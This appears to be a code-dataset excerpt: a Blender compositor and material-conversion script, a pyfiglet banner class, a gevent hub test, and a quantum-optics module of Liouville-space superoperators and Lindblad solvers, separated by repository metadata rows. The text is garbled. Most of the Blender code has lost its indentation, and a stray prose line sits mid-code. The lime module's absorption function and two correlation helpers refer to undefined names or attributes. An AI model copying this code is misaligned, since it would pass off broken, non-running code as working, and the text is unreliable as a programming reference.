viewer_node.inputs[0]) # link Z to output
logger.info('create_depth_output_nodes: Done')
def create_additional_optical_flow_output_nodes(scene,
output_path=None,
image_stem=None,
                                                leading_zeroes_template='#####'):
    logger.info('create_additional_optical_flow_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.use_pass_vector = True
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_links = scene.node_tree.links
scene_nodes = scene.node_tree.nodes
default_render_layers_node = scene_nodes.get('Render Layers')
optical_flow_output_node = scene_nodes.new('CompositorNodeOutputFile')
optical_flow_output_node.format.file_format = 'OPEN_EXR'
#optical_flow_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
optical_flow_output_node.base_path = output_path
if image_stem is not None:
optical_flow_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Vector'],
optical_flow_output_node.inputs['Image'])
logger.info('create_additional_optical_flow_output_nodes: Done')
return optical_flow_output_node
def create_additional_depth_output_nodes(scene,
output_path=None,
image_stem=None,
                                         leading_zeroes_template='#####'):
    logger.info('create_additional_depth_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
depth_image_output_node = scene_nodes.new('CompositorNodeOutputFile')
depth_image_output_node.format.file_format = 'OPEN_EXR'
depth_image_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
depth_image_output_node.base_path = output_path
if image_stem is not None:
depth_image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Depth'],
depth_image_output_node.inputs['Image'])
logger.info('create_additional_depth_output_nodes: Done')
return depth_image_output_node
def create_additional_mask_output_nodes(scene,
object_index,
output_path=None,
image_stem=None,
                                        leading_zeroes_template='#####'):
    logger.info('create_additional_mask_output_nodes: ...')
# Make sure that the render layer passes the object index
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
# Add additional pass values
# default_render_layer.use_pass_combined = True
# default_render_layer.use_pass_mist = True
# default_render_layer.use_pass_normal = True
# default_render_layer.use_pass_vector = True
# default_render_layer.use_pass_uv = True
default_render_layer.use_pass_object_index = True
# default_render_layer.use_pass_material_index = True
# default_render_layer.use_pass_shadow = True
# ========== IMPORTANT FOR TRANSPARENT MATERIALS =========
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
mask_node = scene_nodes.new('CompositorNodeIDMask')
mask_node.index = object_index
mask_node.use_antialiasing = True
image_output_node = scene_nodes.new('CompositorNodeOutputFile')
if output_path is not None:
image_output_node.base_path = output_path
if image_stem is not None:
image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(
default_render_layers_node.outputs['IndexOB'],
mask_node.inputs['ID value'])
scene_links.new(
mask_node.outputs['Alpha'],
image_output_node.inputs['Image'])
logger.info('create_additional_mask_output_nodes: Done')
return mask_node, image_output_node
def create_simple_material():
logger.info('Create Simple Material: ...')
simple_material = bpy.data.materials.new('simple_material')
simple_material.use_nodes = True
simple_material_nodes = simple_material.node_tree.nodes
simple_material_links = simple_material.node_tree.links
shader_node_diffuse_bsdf = simple_material_nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_diffuse_bsdf.inputs[0].default_value = [255,0,0, 1]
return simple_material
def enable_backdrop(enable=True):
logger.info('enable_backdrop: ...')
# Enable backdrop
for area in bpy.context.screen.areas:
if area.type == 'NODE_EDITOR':
for space in area.spaces:
if space.type == 'NODE_EDITOR':
logger.info('Backdrop Enabled')
space.show_backdrop = enable
break
logger.info('enable_backdrop: Done')
class NodeUtility:
USE_MAP_COLOR_DIFFUSE = 'use_map_color_diffuse'
USE_MAP_NORMAL = 'use_map_normal'
DIFFUSE_BSDF = 'Diffuse BSDF'
GLOSSY_BSDF = 'Glossy BSDF'
TRANSPARENT_BSDF = 'Transparent BSDF'
GLASS_BSDF = 'Glass BSDF'
EMISSION = 'Emission'
OBJECT_INFO = 'Object Info'
MATERIAL_OUTPUT = 'Material Output'
SHADER_NODE_RGB = 'ShaderNodeRGB'
SHADER_NODE_MIX_RGB = 'ShaderNodeMixRGB'
SHADER_NODE_EMISSION = 'ShaderNodeEmission'
SHADER_NODE_BSDF_GLASS = 'ShaderNodeBsdfGlass'
SHADER_NODE_OBJECT_INFO = 'ShaderNodeObjectInfo'
@staticmethod
def _collect_texture(type_to_texture_file_path, use_map_type, filepath):
logger.debug('filepath: ' + filepath)
if type_to_texture_file_path[use_map_type] is None:
type_to_texture_file_path[use_map_type] = filepath
else:
logger.warning('Two Textures with the same use_type:')
logger.warning('First: ' + use_map_type + ', ' + type_to_texture_file_path[use_map_type])
logger.warning('Second: ' + use_map_type + ', ' + filepath)
logger.warning('We use the first texture as : ' + use_map_type)
@staticmethod
def _get_blender_internal_texture_type_to_file_paths(material):
some_other_name = material.name
logger.debug(some_other_name)
# fprint('material: ' + material.name)
texture_name_set = set()
texture_type_to_file_path = defaultdict(lambda: None)
for texture_slot in material.texture_slots:
if texture_slot:
texture = texture_slot.texture
texture_name_set.add(texture)
# fprint('texture: ' + texture.name)
if hasattr(texture, 'image'):
logger.debug('Material: ' + material.name + ', Texture: ' + texture.name)
logger.debug('use_map_color_diffuse: ' + str(texture_slot.use_map_color_diffuse))
logger.debug('use_map_normal: ' + str(texture_slot.use_map_normal))
# ==== Remark ====
# Relative paths start with '//' and are relative to the blend file.
# The prefix of paths to textures packed inside the .blend file are dependent on the original
# file path. For example <blend_file_folder>/textures/texture_file.ext, i.e. look like the
# following '//textures/<texturename>.<textureextension>'
if texture.image.packed_file is not None:
logger.debug('Image is packed')
                        # If the texture is packed, the file is definitely valid; otherwise check the file
image_is_valid = True
else:
logger.debug('Image is an external source')
image_is_valid = os.path.isfile(bpy.path.abspath(texture.image.filepath))
if image_is_valid:
if texture_slot.use_map_color_diffuse:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_COLOR_DIFFUSE,
texture.image.filepath)
elif texture_slot.use_map_normal:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_NORMAL,
texture.image.filepath)
logger.info('texture_type_to_file_path: ' + str(texture_type_to_file_path))
return texture_type_to_file_path
@staticmethod
def replace_bsdf_node_in_material(material, old_node, new_node, preceding_node=None, next_node=None):
nodes = material.node_tree.nodes
links = material.node_tree.links
        # we replace the old BSDF node with a new one
nodes.remove(old_node)
if preceding_node is not None:
links.new(preceding_node.outputs[0], new_node.inputs[0])
if next_node is not None:
links.new(new_node.outputs[0], next_node.inputs[0])
@staticmethod
def create_material_nodes_for_cycle_using_blender_internal_textures(material_default_bsdf_type=DIFFUSE_BSDF,
transparent_default_bsdf_type=TRANSPARENT_BSDF):
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: ...')
bpy.context.scene.render.engine = 'CYCLES'
# # each object has several material slots, which link to the materials provided in bpy.data.materials
# for material in bpy.data.materials:
for object in bpy.data.objects:
logger.debug('object.name: ' + object.name)
for material_slot in object.material_slots:
material = material_slot.material
# https://wiki.blender.org/index.php/Dev:Py/Scripts/Cookbook/Code_snippets/Nodes
logger.info('material.name: ' + material.name)
# change only blender internal materials (keep cycle materials as is)
if not material.use_nodes:
logger.debug('Adding nodes ...')
# this adds by default a node "Material Output" and a node "Diffuse BSDF"
material.use_nodes = True
# get the "Diffuse BSDF" node
nodes = material.node_tree.nodes
links = material.node_tree.links
                    # this diffuse node automatically inherits the color of the material
shader_node_diffuse_bsdf = nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_material_output = nodes.get("Material Output")
                    # These texture file paths should be valid
texture_type_to_file_path = NodeUtility._get_blender_internal_texture_type_to_file_paths(material)
# 1 Case: Material is just a texture
# Image Texture -> Diffuse BSDF/Glossy BSDF -> Material Output
color_texture_file_path = texture_type_to_file_path[NodeUtility.USE_MAP_COLOR_DIFFUSE]
logger.debug('color_texture_file_path: ' + str(color_texture_file_path))
if color_texture_file_path is not None:
logger.debug('Converting Material With Texture: ' + color_texture_file_path)
logger.debug('Texture path is valid')
# test if the image texture node has already been created
shader_node_tex_image = nodes.get("Image Texture")
if not shader_node_tex_image:
shader_node_tex_image = nodes.new(type='ShaderNodeTexImage')
shader_node_tex_image.image = bpy.data.images.load(color_texture_file_path)
# link the nodes
links.new(shader_node_tex_image.outputs[0], shader_node_diffuse_bsdf.inputs[0])
# if material_default_bsdf_type == BICyclesMaterialConverter.GLOSSY_BSDF:
#
# logger.debug('Replace Diffuse Material Node with Glossy Material Node' )
# shader_node_glossy_bsdf = nodes.get(BICyclesMaterialConverter.GLOSSY_BSDF)
# if not shader_node_glossy_bsdf:
#
# shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
#
# BICyclesMaterialConverter._replace_bsdf_node(material,
# old_node=shader_node_diffuse_bsdf,
# new_node=shader_node_glossy_bsdf,
# preceding_node=shader_node_tex_image,
# next_node=shader_node_material_output)
# 2 Case: Material is transparent
# RGB -> Transparent BSDF/Glass BSDF -> Material Output
elif material.use_transparency:
logger.debug('Converting Transparent Material')
shader_node_transparent_or_glass_bsdf = nodes.get(transparent_default_bsdf_type)
if not shader_node_transparent_or_glass_bsdf:
if transparent_default_bsdf_type == NodeUtility.GLASS_BSDF:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfGlass')
else:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfTransparent')
shader_node_RGB = nodes.new(type='ShaderNodeRGB')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_transparent_or_glass_bsdf,
preceding_node=shader_node_RGB,
next_node=shader_node_material_output)
else:
logger.debug('Converting Material With Simple Color')
# by default there is just a diffuse bsdf created using the color of the material
if material_default_bsdf_type == NodeUtility.GLOSSY_BSDF:
logger.debug('Replace Diffuse Material Node with Glossy Material Node')
shader_node_glossy_bsdf = nodes.get(NodeUtility.GLOSSY_BSDF)
if not shader_node_glossy_bsdf:
shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_glossy_bsdf,
preceding_node=None,
next_node=shader_node_material_output)
else:
logger.debug('Material has already a node ...')
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: Done')
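A minimal usage sketch under stated assumptions: the converter logs its own name as create_material_nodes_for_cycle_using_blender_internal_textures, and the NodeUtility constants it references suggest it lives on that class; the exact binding and call path are assumptions, not confirmed by this excerpt.
# hypothetical invocation; the owning class and method binding are assumptions
NodeUtility.create_material_nodes_for_cycle_using_blender_internal_textures(
    material_default_bsdf_type=NodeUtility.GLOSSY_BSDF,
    transparent_default_bsdf_type=NodeUtility.GLASS_BSDF)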
| true
| true
|
1c40faaf42dbbc4233733833e983cceebe86327e
| 575
|
py
|
Python
|
cfn_sweeper/artwork.py
|
rileydakota/cfn-sweeper
|
0f76aed79e1200e006322b2b0371475a3fd7e475
|
[
"MIT"
] | 9
|
2021-08-20T17:09:40.000Z
|
2021-08-23T18:17:25.000Z
|
cfn_sweeper/artwork.py
|
rileydakota/cfn-sweeper
|
0f76aed79e1200e006322b2b0371475a3fd7e475
|
[
"MIT"
] | 5
|
2021-08-20T16:58:42.000Z
|
2022-01-31T21:37:56.000Z
|
cfn_sweeper/artwork.py
|
rileydakota/cfn-sweeper
|
0f76aed79e1200e006322b2b0371475a3fd7e475
|
[
"MIT"
] | 1
|
2022-02-01T14:28:33.000Z
|
2022-02-01T14:28:33.000Z
|
from re import X
from pyfiglet import Figlet
class Artwork():
def art():
f = Figlet(font='larry3d')
print("\n https://github.com/rileydakota/cfn-sweeper" )
print (f.renderText('CFN SWEEPER \n'))
print((" The umanaged resource detector tool!").center(20))
print(("-----------------------------------------------------------").center(24, " "))
print((" Run Report").center(20))
print(("-----------------------------------------------------------").center(24, " "))
| 47.916667
| 96
| 0.405217
|
from re import X
from pyfiglet import Figlet
class Artwork():
def art():
f = Figlet(font='larry3d')
print("\n https://github.com/rileydakota/cfn-sweeper" )
print (f.renderText('CFN SWEEPER \n'))
print((" The umanaged resource detector tool!").center(20))
print(("-----------------------------------------------------------").center(24, " "))
print((" Run Report").center(20))
print(("-----------------------------------------------------------").center(24, " "))
| true
| true
|
1c40fb60855ff8ad9cbd7cc279f358bfd6c110bb
| 304
|
py
|
Python
|
greentest/test_hub_join.py
|
davidbalbert/gevent3000
|
3c940dbb2804ec7fe9001758d339eeb423793a28
|
[
"MIT"
] | 1
|
2017-01-04T10:58:59.000Z
|
2017-01-04T10:58:59.000Z
|
greentest/test_hub_join.py
|
hewigovens/gevent-for-ios
|
0ef7b67497297b71ed71bca068e56bc103df9069
|
[
"MIT"
] | 1
|
2019-04-24T06:29:29.000Z
|
2019-04-24T06:29:29.000Z
|
greentest/test_hub_join.py
|
davidbalbert/gevent3000
|
3c940dbb2804ec7fe9001758d339eeb423793a28
|
[
"MIT"
] | null | null | null |
import gevent
# hub.join() guarantees that loop has exited cleanly
res = gevent.get_hub().join()
assert res is True, res
res = gevent.get_hub().join()
assert res is True, res
# but it is still possible to use gevent afterwards
gevent.sleep(0.01)
res = gevent.get_hub().join()
assert res is True, res
| 20.266667
| 52
| 0.730263
|
import gevent
res = gevent.get_hub().join()
assert res is True, res
res = gevent.get_hub().join()
assert res is True, res
gevent.sleep(0.01)
res = gevent.get_hub().join()
assert res is True, res
| true
| true
|
1c40fcbd5a8dba2b2a356b28ee8871a2e93137ee
| 19,573
|
py
|
Python
|
lime/superoperator.py
|
binggu56/lime
|
07f60c5105f0bedb11ac389fd671f4f1737a71fe
|
[
"MIT"
] | 4
|
2020-01-15T11:52:23.000Z
|
2021-01-05T19:40:36.000Z
|
lime/superoperator.py
|
binggu56/scitools
|
3f7ce3d8411a23186c73f1bb87a8778e039fbd0b
|
[
"MIT"
] | null | null | null |
lime/superoperator.py
|
binggu56/scitools
|
3f7ce3d8411a23186c73f1bb87a8778e039fbd0b
|
[
"MIT"
] | 3
|
2020-02-14T07:10:44.000Z
|
2021-04-14T17:49:45.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 25 22:01:00 2020
@author: Bing
Modules for computing signals with superoperator formalism in Liouville space
Instead of performing open quantum dynamics, the Liouvillian is directly diagonalized
Possible improvements:
1. merge the Qobj class with QUTIP
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import kron, identity, issparse
from scipy.sparse.linalg import eigs
import scipy
import math
from numba import jit
from numpy import exp
from lime.phys import dag, pauli
from lime.mol import Result
# from qutip import Qobj as Basic
def liouvillian(H, c_ops):
'''
Construct the Liouvillian out of the Hamiltonian and collapse operators
Parameters
----------
    H : 2d array
        Hamiltonian.
    c_ops : list of 2d arrays
        collapse operators.
    Returns
    -------
    l : sparse matrix
        Liouvillian superoperator.
'''
# dissipator = 0.
if c_ops is None:
c_ops = []
l = -1j * operator_to_superoperator(H)
for c_op in c_ops:
l = l + lindblad_dissipator(c_op)
# l = operator_to_superoperator(H) + 1j * dissipator
return l
class Qobj():
def __init__(self, data=None, dims=None):
"""
Class for quantum operators: is this useful?
Parameters
----------
        data : 2d array, optional
            matrix representation; random if omitted.
        dims : tuple
            dimensions of the operator.
Returns
-------
None.
"""
# Basic.__init__(self, dims=dims, inpt=data)
self.dims = dims
self.data = data
if data is None:
self.data = np.random.randn(*dims)
self.shape = self.data.shape
return
def dot(self, b):
return Qobj(np.dot(self.data, b.data))
def conjugate(self):
return np.conjugate(self.data)
def to_vector(self):
return operator_to_vector(self.data)
    def to_super(self, kind='commutator'):
        return operator_to_superoperator(self.data, kind=kind)
    def to_linblad(self, gamma=1.):
        # standard Lindblad form: l rho l^dag - 0.5 {l^dag l, rho}
        l = self.data
        return gamma * (kron(l, l.conj()) - 0.5 *
               operator_to_superoperator(dag(l).dot(l), kind='anticommutator'))
def liouville_space(N):
"""
    construct the Liouville space out of an N-dimensional Hilbert space basis |ij>
"""
return
def operator_to_vector(rho):
"""
    flatten an operator/density matrix into a vector in Liouville space
    Parameters
    ----------
    rho : 2d array or sparse matrix
        operator/density matrix.
    Returns
    -------
    1d array.
"""
if isinstance(rho, np.ndarray):
return rho.flatten()
else:
return rho.toarray().flatten()
def dm2vec(rho):
"""
transform an operator/density matrix to a vector in Liouville space
Parameters
----------
    rho : 2d array or sparse matrix
        operator/density matrix.
    Returns
    -------
    flattened vector in Liouville space.
"""
if issparse(rho):
n, m = rho.shape
return rho.tolil().reshape((n*m, 1))
else:
return rho.flatten()
# def vec2dm(rho):
# """
# transform an operator/density matrix to a vector in Liouville space
# Parameters
# ----------
# A : TYPE
# DESCRIPTION.
# Returns
# -------
# None.
# """
# if isinstance(rho, np.ndarray):
# return np.reshape()
# else:
# return rho.toarray().flatten()
def op2sop(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def to_super(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def vec2mat_index(N, I):
"""
Convert a vector index to a matrix index pair that is compatible with the
vector to matrix rearrangement done by the vec2mat function.
From Qutip.
"""
j = int(I / N)
i = I - N * j
return i, j
def mat2vec_index(N, i, j):
"""
Convert a matrix index pair to a vector index that is compatible with the
matrix to vector rearrangement done by the mat2vec function.
From Qutip.
"""
return i + N * j
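# Quick round-trip check of the two index maps above (illustrative sketch only):
# with N = 3, vector index 5 unpacks to the matrix entry (i, j) = (2, 1),
# and mat2vec_index recovers it, since 2 + 3 * 1 == 5.
#   assert vec2mat_index(3, 5) == (2, 1)
#   assert mat2vec_index(3, 2, 1) == 5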
def operator_to_superoperator(a, kind='commutator'):
"""
promote an operator/density matrix to an superoperator in
Liouville space
Parameters
----------
A : TYPE
DESCRIPTION.
Returns
-------
None.
"""
N = a.shape[-1]
idm = identity(N)
if kind in ['commutator', 'c', '-']:
return kron(a, idm) - kron(idm, a.T)
elif kind in ['left', 'l']:
# elementwise operator for defining the commutator
# for n in range(N2):
# i, j = divmod(n, N)
# for m in range(N2):
# k, l = divmod(m, N)
# am[n, m] = a[i, k] * idm[j,l]
return kron(a, idm)
elif kind in ['right', 'r']:
return kron(idm, a.T)
elif kind in ['anticommutator', 'a', '+']:
return kron(a, idm) + kron(idm, a.T)
else:
raise ValueError('Error: superoperator {} does not exist.'.format(kind))
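# Sanity check of the row-major (.flatten()) vec convention used above,
# an illustrative sketch rather than part of the module's API: left/right
# multiplication in Hilbert space becomes matrix-vector multiplication
# in Liouville space.
#   a, rho = np.random.randn(3, 3), np.random.randn(3, 3)
#   assert np.allclose((a @ rho).flatten(),
#                      operator_to_superoperator(a, kind='left') @ rho.flatten())
#   assert np.allclose((rho @ a).flatten(),
#                      operator_to_superoperator(a, kind='right') @ rho.flatten())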
def lindblad_dissipator(l):
return kron(l, l.conj()) - 0.5 *\
operator_to_superoperator(dag(l).dot(l), kind='anticommutator')
# return gamma * (left(l).dot(right(dag(l))) - 0.5 *\
# operator_to_superoperator(dag(l).dot(l), type='anticommutator'))
def left(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(a, idm)
def right(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(idm, a.T)
def kraus(a):
"""
Kraus superoperator a rho a^\dag = a^\dag_R a_L
Parameters
----------
    a : 2d array
        Kraus operator.
    Returns
    -------
    sparse matrix
        superoperator for a rho a^dag.
"""
al = left(a)
ar = right(dag(a))
return ar.dot(al)
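# Under the same row-major convention, kraus(a) acting on vec(rho) yields
# vec(a @ rho @ dag(a)): right(dag(a)) @ left(a) reduces to kron(a, a.conj()).
# Illustrative check (commented out):
#   assert np.allclose((a @ rho @ dag(a)).flatten(), kraus(a) @ rho.flatten())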
# def obs(rho, a):
# """
# Return expectation value of a for rho in Liouville space.
# Parameters
# ----------
# rho : TYPE
# DESCRIPTION.
# a : TYPE
# DESCRIPTION.
# Returns
# -------
# None.
# """
# idv = operator_to_vector(np.identity(a.shape[-1]))
# return np.vdot(idv, left(a).dot(rho))
# @jit
def obs(rho, a):
return np.vdot(operator_to_vector(dag(a)), rho)
def trace(rho):
n = math.isqrt(len(rho))
return np.vdot(operator_to_vector(np.identity(n)), rho)
def resolvent(omega, L):
'''
Resolvent of the Lindblad quantum master equation
Parameters
----------
    omega : float
        frequency.
L : 2d array
full liouvillian
Returns
-------
None.
'''
idm = np.identity(L.shape[0])
return np.linalg.inv(omega * idm - L)
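# Note: resolvent(omega, L) is the Laplace transform of the propagator
# exp(L * t) evaluated at s = omega, which is why the frequency-domain
# correlation helpers below contract operators against it instead of
# time-propagating the density matrix.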
def _correlation_2p_1f(omegas, rho0, ops, L):
a, b = ops
out = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
out[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return out
def _correlation_2p_1t(omegas, rho0, ops, L):
a, b = ops
cor = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
cor[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return cor
def sort(eigvals, eigvecs):
idx = np.argsort(eigvals)
eigvals = eigvals[idx]
eigvecs = eigvecs[:,idx]
return eigvals, eigvecs
def cdot(a, b):
"""
matrix product of a.H.dot(b)
Parameters
----------
a : TYPE
DESCRIPTION.
b : TYPE
DESCRIPTION.
Returns
-------
None.
"""
return dag(a) @ b
def absorption(mol, omegas, c_ops):
"""
superoperator formalism for absorption spectrum
Parameters
----------
    mol : object
        model system supplying the Hamiltonian and dipole.
    omegas: vector
        detection window of the spectrum
    c_ops : list
        list of collapse operators
Returns
-------
None.
"""
gamma = 0.02
l = op2sop(H) + 1j * c_op.to_linblad(gamma=gamma)
ntrans = 3 * nstates # number of transitions
eigvals1, U1 = eigs(l, k=ntrans, which='LR')
eigvals1, U1 = sort(eigvals1, U1)
# print(eigvals1)
omegas = np.linspace(0.1 , 10.5, 200)
rho0 = Qobj(dims=[10,10])
rho0.data[0,0] = 1.0
ops = [sz, sz]
# out = correlation_2p_1t(omegas, rho0, ops, L)
# print(eigvecs)
eigvals2, U2 = eigs(dag(l), k=ntrans, which='LR')
eigvals2, U2 = sort(eigvals2, U2)
#idx = np.where(eigvals2.real > 0.2)[0]
#print(idx)
norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(ntrans)]
la = np.zeros(len(omegas), dtype=complex) # linear absorption
for j, omega in enumerate(omegas):
for n in range(ntrans):
la[j] += np.vdot(dip.to_vector(), U1[:,n]) * \
np.vdot(U2[:,n], dip.dot(rho0).to_vector()) \
/(omega - eigvals1[n]) / norm[n]
fig, ax = plt.subplots()
# ax.scatter(eigvals1.real, eigvals1.imag)
ax.plot(omegas, -2 * la.imag)
return
class Lindblad_solver:
def __init__(self, H, c_ops=None):
"""
Liouville equation solver.
Parameters
----------
        H : 2d array
            Hamiltonian.
        c_ops : list, optional
            collapse operators. The default is None.
Returns
-------
None.
"""
self.H = H
self.c_ops = c_ops
self.L = None
self.dim = H.shape[-1]**2
self.idv = operator_to_vector(np.identity(H.shape[-1]))
self.left_eigvecs = None
self.right_eigvecs = None
self.eigvals = None
self.norm = None
# self.nstates = None # number of states used while diagonalizing L
def liouvillian(self):
L = liouvillian(self.H, self.c_ops)
self.L = L
return L
def eigenstates(self, k=None):
if self.L is None:
# raise ValueError('L is None. Call liouvillian to construct L first.')
L = self.liouvillian()
else:
L = self.L
N = L.shape[-1]
if k is None:
w, vl, vr = scipy.linalg.eig(L.toarray(), left=True, \
right=True)
self.eigvals = w
self.left_eigvecs = vl
self.right_eigvecs = vr
# self.norm = [np.vdot(vl[:,n], vr[:,n]) for n in range(self.dim)]
self.norm = np.diagonal(cdot(vl, vr)).real
elif k < N-1:
# right eigenvectors of L
evals1, U1 = eigs(L, k=k, which='LR')
evals1, U1 = sort(evals1, U1)
# left
evals2, U2 = eigs(dag(L), k=k, which='LR')
evals2, U2 = sort(evals2, U2)
else:
raise ValueError('k should be < the size of the matrix.')
return w, vr, vl
def evolve(self, rho0, tlist, e_ops):
result = Result(times=tlist)
# evals, evecs_r, evecs_l = self.eigvals, self.eigvecs_right,\
# self.eigvecs_left
# if self.eigvals is None:
# evals, U1, U2 = self.eigenstates(k=k)
# else:
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
norm = self.norm
# print('norm', norm)
rho0 = operator_to_vector(rho0)
# if k is None:
# k = self.dim
k = U1.shape[-1]
observables = np.zeros((len(tlist), len(e_ops)), dtype=complex)
coeff = [np.vdot(U2[:,n], rho0)/norm[n] for n in range(k)]
for i, t in enumerate(tlist):
rho = U1.dot(coeff * exp(evals * t))
# print(trace(rho))
observables[i, :] = [obs(rho, e_op) for e_op in e_ops]
result.observables = observables
return result
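    # The propagation above is spectral rather than step-by-step: with
    # L r_n = lambda_n r_n and L^dag l_n = conj(lambda_n) l_n,
    #   rho(t) = sum_n (<l_n, rho_0> / <l_n, r_n>) * exp(lambda_n * t) * r_n,
    # which is exactly what the coeff list and the U1.dot(...) line compute.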
def correlation_2op_1t(self, rho0, ops, tlist):
"""
Compute <A(t)B> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b = ops
# if self.eigvals is None:
# evals, U1, U2 = self.eigenstates(k=k)
# else:
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
# if k is None:
# k = self.dim
k = U1.shape[-1]
# norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(k)]
norm = self.norm
idv = self.idv
cor = np.zeros(len(tlist), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i, t in enumerate(tlist):
cor[i] = np.sum(exp(evals * t) * coeff)
return cor
def correlation_2op_1w(self, rho0, ops, w):
"""
Compute S(w) = <A(w)B> = int_0^\infty <A(t)B> exp(iwt) dt
by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b = ops
# if self.eigvals is None:
# evals, U1, U2 = self.eigenstates(k=k)
# else:
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = len(evals)
norm = self.norm
idv = self.idv
S = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i in range(len(w)):
S[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return S
def correlation_3op_1t(self, rho0, ops, t):
"""
Compute <A(t)B> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(t), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(t)):
cor[i] = np.sum( exp(evals * t[i]) * coeff)
return cor
def correlation_3op_1w(self, rho0, ops, w):
"""
Compute <A(t)B> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(w)):
cor[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return cor
def correlation_3op_2t(self, rho0, ops, tlist, taulist, k=None):
"""
Compute <A(t)B(t+tau)C(t)> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b, c = ops
rho0 = operator_to_vector(rho0)
cor = np.zeros((len(tlist), len(taulist)), dtype=complex)
# diagonalize the Liouvillian
# evals, U1, U2 = self.eigenstates(k=k)
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
if k is None:
k = self.dim
# assert(np.allclose(evals1, evals2.conj()))
# print(evals2)
# assert(evals1.imag.all() > 0)
# assert(np.allclose(evals1, evals2.conj(), atol=1e-4))
#norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(k)]
norm = self.norm
idv = self.idv
coeff = np.zeros((k,k), dtype=complex)
for m in range(k):
for n in range(k):
coeff[m, n] = np.vdot(idv, left(b).dot(U1[:, m])) * \
np.vdot(U2[:,m], right(a).dot(left(c).dot(U1[:,n])))/norm[m]\
* np.vdot(U2[:, n], rho0)/norm[n]
# for i, t in enumerate(tlist):
# for j, tau in enumerate(taulist):
tmp1 = exp(np.outer(evals, taulist))
tmp2 = exp(np.outer(evals, tlist))
cor = tmp1.T @ coeff @ tmp2
return cor
def correlation_4op_2t(self, rho0, ops, tlist, taulist, k=None):
"""
Compute <A(t)B(t+tau)C(t)> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
if len(ops) != 4:
raise ValueError('Number of operators is not 4.')
else:
a, b, c, d = ops
corr = self.correlation_3op_2t(rho0=rho0, ops=[a, b@c, d], tlist=tlist, \
taulist=taulist, k=k)
return corr
if __name__ == '__main__':
from lime.units import au2fs, au2ev
